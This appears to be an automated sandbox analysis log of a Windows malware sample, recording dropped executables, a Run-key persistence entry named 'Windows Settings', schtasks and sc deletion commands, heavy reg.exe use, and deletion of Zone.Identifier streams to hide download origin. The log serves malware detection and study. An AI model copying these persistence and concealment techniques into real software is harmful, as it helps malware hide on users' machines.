    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: mscoree.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: version.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: propsys.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: edputil.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: wintypes.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: appresolver.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: bcp47langs.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: slc.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: sppc.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dllJump to behavior
    Source: a0RkmvhSaf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: mscorlib.pdb source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: System.ni.pdbRSDS source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: System.Management.pdb source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: mscorlib.ni.pdb source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: System.Management.ni.pdb source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: System.ni.pdb source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: System.pdb source: WERBE6A.tmp.dmp.12.dr
    Source: a0RkmvhSaf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: a0RkmvhSaf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: a0RkmvhSaf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: a0RkmvhSaf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: a0RkmvhSaf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
    Source: 2047112978.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x6730
    Source: newtpp[1].exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1ebcb
    Source: 2052810334.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x12c25
    Source: 230053364.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1ebcb
    Source: 396820397.exe.5.drStatic PE information: real checksum: 0x0 should be: 0xd4ec
    Source: 393932919.exe.5.drStatic PE information: real checksum: 0x0 should be: 0xbb5f
    Source: 634722489.exe.5.drStatic PE information: real checksum: 0xd961 should be: 0x12961
    Source: 5[1].exe.5.drStatic PE information: real checksum: 0x0 should be: 0x10942
    Source: 4[1].exe.5.drStatic PE information: real checksum: 0x0 should be: 0x6730
    Source: 11[1].exe.5.drStatic PE information: real checksum: 0x0 should be: 0x16659
    Source: 3[1].exe.5.drStatic PE information: real checksum: 0x0 should be: 0x10942
    Source: 6[1].exe.5.drStatic PE information: real checksum: 0x0 should be: 0x105a9
    Source: 2[1].exe.5.drStatic PE information: real checksum: 0x0 should be: 0x12c25
    Source: 7[1].exe.5.drStatic PE information: real checksum: 0x0 should be: 0xbb5f
    Source: 2028814805.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x105a9
    Source: sysludpvs.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x1ebcb
    Source: 417928448.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x10942
    Source: 1[1].exe.5.drStatic PE information: real checksum: 0xd961 should be: 0x12961
    Source: 10[1].exe.5.drStatic PE information: real checksum: 0x0 should be: 0xd4ec
    Source: 8[1].exe.5.drStatic PE information: real checksum: 0x0 should be: 0xf6a9
    Source: 399630275.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x10942
    Source: 203235335.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x16659
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeCode function: 0_2_00F81A11 push ecx; ret 0_2_00F81A24
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeCode function: 5_2_007B1B71 push ecx; ret 5_2_007B1B84
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeCode function: 13_2_00007FF7C6B000BD pushad ; iretd 13_2_00007FF7C6B000C1
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeCode function: 18_2_00007FF7C6B200BD pushad ; iretd 18_2_00007FF7C6B200C1
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeCode function: 23_2_00007FF7C6AE00BD pushad ; iretd 23_2_00007FF7C6AE00C1
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeCode function: 28_2_00007FF7C6AF00BD pushad ; iretd 28_2_00007FF7C6AF00C1
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeCode function: 40_2_00007FF7C6B000BD pushad ; iretd 40_2_00007FF7C6B000C1
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeCode function: 54_2_00007FF7C6B100BD pushad ; iretd 54_2_00007FF7C6B100C1
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeCode function: 59_2_00007FF7C6B100BD pushad ; iretd 59_2_00007FF7C6B100C1

    Persistence and Installation Behavior

    barindex
    Drops executables to the windows directory (C:\Windows) and starts them
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeExecutable created and started: C:\Windows\sysludpvs.exeJump to behavior
    Uses cmd line tools excessively to alter registry or file data
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeFile created: C:\Windows\sysludpvs.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\7[1].exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile created: C:\Users\user\AppData\Local\Temp\399630275.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile created: C:\Users\user\AppData\Local\Temp\1216017805.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile created: C:\Users\user\AppData\Local\Temp\203235335.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile created: C:\Users\user\AppData\Local\Temp\2047112978.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile created: C:\Users\user\AppData\Local\Temp\634722489.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile created: C:\Users\user\AppData\Local\Temp\417928448.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\3[1].exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile created: C:\Users\user\AppData\Local\Temp\393932919.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\11[1].exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile created: C:\Users\user\AppData\Local\Temp\2052810334.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\4[1].exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\2[1].exeJump to dropped file
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\6[1].exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\8[1].exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\9[1].exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile created: C:\Users\user\AppData\Local\Temp\38822795.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\10[1].exeJump to dropped file
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeFile created: C:\Users\user\AppData\Local\Temp\230053364.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile created: C:\Users\user\AppData\Local\Temp\2028814805.exeJump to dropped file
    Source: C:\Windows\sysludpvs.exeFile created: C:\Users\user\AppData\Local\Temp\152942395.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile created: C:\Users\user\AppData\Local\Temp\2860723397.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile created: C:\Users\user\AppData\Local\Temp\396820397.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\1[1].exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\5[1].exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\12[1].exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeFile created: C:\Windows\sysludpvs.exeJump to dropped file

    Boot Survival

    barindex
    Uses schtasks.exe or at.exe to add and modify task schedules
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Service"
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows SettingsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows SettingsJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "Windows Services"

    Hooking and other Techniques for Hiding and Protection

    barindex
    Hides that the sample has been downloaded from the Internet (zone.identifier)
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeFile opened: C:\Users\user\AppData\Local\Temp\230053364.exe:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeFile opened: C:\Users\user\AppData\Local\Temp\230053364.exe:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Windows\sysludpvs.exeFile opened: C:\Windows\sysludpvs.exe:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Windows\sysludpvs.exeFile opened: C:\Users\user\AppData\Local\Temp\152942395.exe:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile opened: C:\Users\user\AppData\Local\Temp\634722489.exe:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile opened: C:\Users\user\AppData\Local\Temp\2052810334.exe:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile opened: C:\Users\user\AppData\Local\Temp\417928448.exe:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile opened: C:\Users\user\AppData\Local\Temp\2047112978.exe:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile opened: C:\Users\user\AppData\Local\Temp\399630275.exe:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile opened: C:\Users\user\AppData\Local\Temp\2028814805.exe:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile opened: C:\Users\user\AppData\Local\Temp\393932919.exe:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile opened: C:\Users\user\AppData\Local\Temp\1216017805.exe:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile opened: C:\Users\user\AppData\Local\Temp\38822795.exe:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile opened: C:\Users\user\AppData\Local\Temp\396820397.exe:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile opened: C:\Users\user\AppData\Local\Temp\203235335.exe:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeFile opened: C:\Users\user\AppData\Local\Temp\2860723397.exe:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeProcess information set: NOOPENFILEERRORBOX
